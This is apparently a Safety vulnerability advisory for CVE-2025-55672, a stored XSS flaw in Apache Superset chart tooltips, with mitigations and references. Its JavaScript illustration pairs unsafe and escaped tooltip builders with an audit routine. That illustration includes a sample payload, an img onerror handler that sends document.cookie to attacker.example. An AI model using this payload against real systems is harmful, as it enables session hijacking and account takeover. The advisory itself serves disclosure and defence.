PyPI: apache-superset
CVE-2025-55672
Safety vulnerability ID: SFTY-20250815-18115
Safety legacy ID: pyup.io-78711
Overview
Apache Superset's chart visualization has a stored Cross-Site Scripting (XSS) vulnerability
Advisory
Affected versions of the apache‑superset package are vulnerable to stored Cross‑site Scripting (XSS) because chart column labels are rendered into the chart's hover tooltip without being HTML‑encoded. An authenticated user with edit‑chart permissions can save a column label that contains HTML or script; the label is stored with the chart and is emitted as markup, so the payload runs in the browser of any user who views the chart and hovers over it. Because the script executes in the victim's Superset session, it can read session‑bound data and perform arbitrary actions in the application on behalf of that user (for example, an administrator), which is how a low‑privilege chart editor can escalate to session hijacking or account takeover. No user interaction beyond viewing and hovering over the chart is required.
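The following is an added illustration of the bug class described above; it is not Superset's own tooltip or chart code, and the function names, the field layout of the sample chart definitions, and the payload are assumptions chosen for the example. It shows a tooltip builder that splices a label straight into HTML (the vulnerable pattern) beside one that encodes every user-controlled string first, plus a small audit that walks saved chart parameters and reports any label containing markup or event-handler attributes, which is the check an operator would run over existing charts before and after patching.

```javascript
// Illustrative model of the CVE-2025-55672 bug class (stored XSS through a
// chart column label rendered into a hover tooltip). This is NOT Apache
// Superset's code; names and data shapes below are assumptions for the example.

// Constructed payload: what a user with edit-chart permission could save as a
// column label. Inert here, because nothing in this script renders HTML.
const MALICIOUS_LABEL =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Minimal HTML encoding for text nodes and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// VULNERABLE PATTERN: the label is trusted and concatenated straight into the
// markup that a chart library would assign to the tooltip's innerHTML on hover.
function buildTooltipUnsafe(label, value) {
  return `<div class="tooltip"><b>${label}</b>: ${value}</div>`;
}

// HARDENED: every user-controlled string is encoded before it becomes markup,
// so the stored payload is displayed as text instead of being executed.
function buildTooltipSafe(label, value) {
  return `<div class="tooltip"><b>${escapeHtml(label)}</b>: ${escapeHtml(value)}</div>`;
}

// Audit helper: walk a saved chart definition and flag any string that looks
// like HTML, a javascript: URL, or an inline event handler. The `params`
// layout mimics a saved chart (metrics with labels, column lists); it is an
// assumption, not Superset's exact schema.
const MARKUP_RE = /<[a-z!\/]|javascript:|on\w+\s*=/i;

function findSuspiciousLabels(params) {
  const hits = [];
  const walk = (node, path) => {
    if (typeof node === 'string') {
      if (MARKUP_RE.test(node)) hits.push({ path, value: node });
    } else if (Array.isArray(node)) {
      node.forEach((v, i) => walk(v, `${path}[${i}]`));
    } else if (node && typeof node === 'object') {
      for (const [k, v] of Object.entries(node)) walk(v, path ? `${path}.${k}` : k);
    }
  };
  walk(params, '');
  return hits;
}

// Constructed sample: one benign chart and one carrying the payload above.
const SAMPLE_CHARTS = [
  { slice_name: 'Revenue by region',
    params: { metrics: [{ label: 'SUM(revenue)' }], columns: ['region'] } },
  { slice_name: 'Poisoned chart',
    params: { metrics: [{ label: MALICIOUS_LABEL }], columns: ['region'] } },
];

// Returns only the charts that contain at least one suspicious string.
function auditCharts(charts) {
  return charts
    .map(c => ({ slice_name: c.slice_name, hits: findSuspiciousLabels(c.params) }))
    .filter(r => r.hits.length > 0);
}

console.log('unsafe tooltip:', buildTooltipUnsafe(MALICIOUS_LABEL, 42));
console.log('safe tooltip:  ', buildTooltipSafe(MALICIOUS_LABEL, 42));
console.log('audit findings:', JSON.stringify(auditCharts(SAMPLE_CHARTS), null, 2));
```

The audit regex is deliberately broad: a label such as `x < y` does not trip it, but any tag-like `<img`, `javascript:` URL or `onerror=` attribute does, and false positives are cheap to review by hand. In a real deployment the same walk would be run over chart definitions exported from the Superset API or read from its metadata database rather than over the constructed sample.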
How to Fix
Mitigation and Workarounds
Upgrade to a release of apache-superset that fixes this issue. Until the upgrade is done, limit the edit-chart permission to trusted users, since saving a hostile column label requires that permission, and review existing chart definitions for labels that contain HTML markup, inline event handlers or script. A restrictive Content Security Policy on the Superset web application reduces what a stored XSS payload can do but does not remove the flaw.
Vulnerable Functions
Functions linked to known vulnerabilities.
References
- https://getsafety.com/vulnerabilities/SFTY-20250815-18115/CVE-2025-55672
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55672
- https://github.com/advisories/GHSA-fj97-2v9x-w5m4
- https://nvd.nist.gov/vuln/detail/CVE-2025-55672
- https://lists.apache.org/thread/rvh7fdjfzxzjhcfwoz7twc2brhvochdj
- http://www.openwall.com/lists/oss-security/2025/08/14/4
Verified by Safety
Our Cybersecurity Intelligence Team reviewed this vulnerability. We combine public data with our own research to find issues not yet reported to public sources.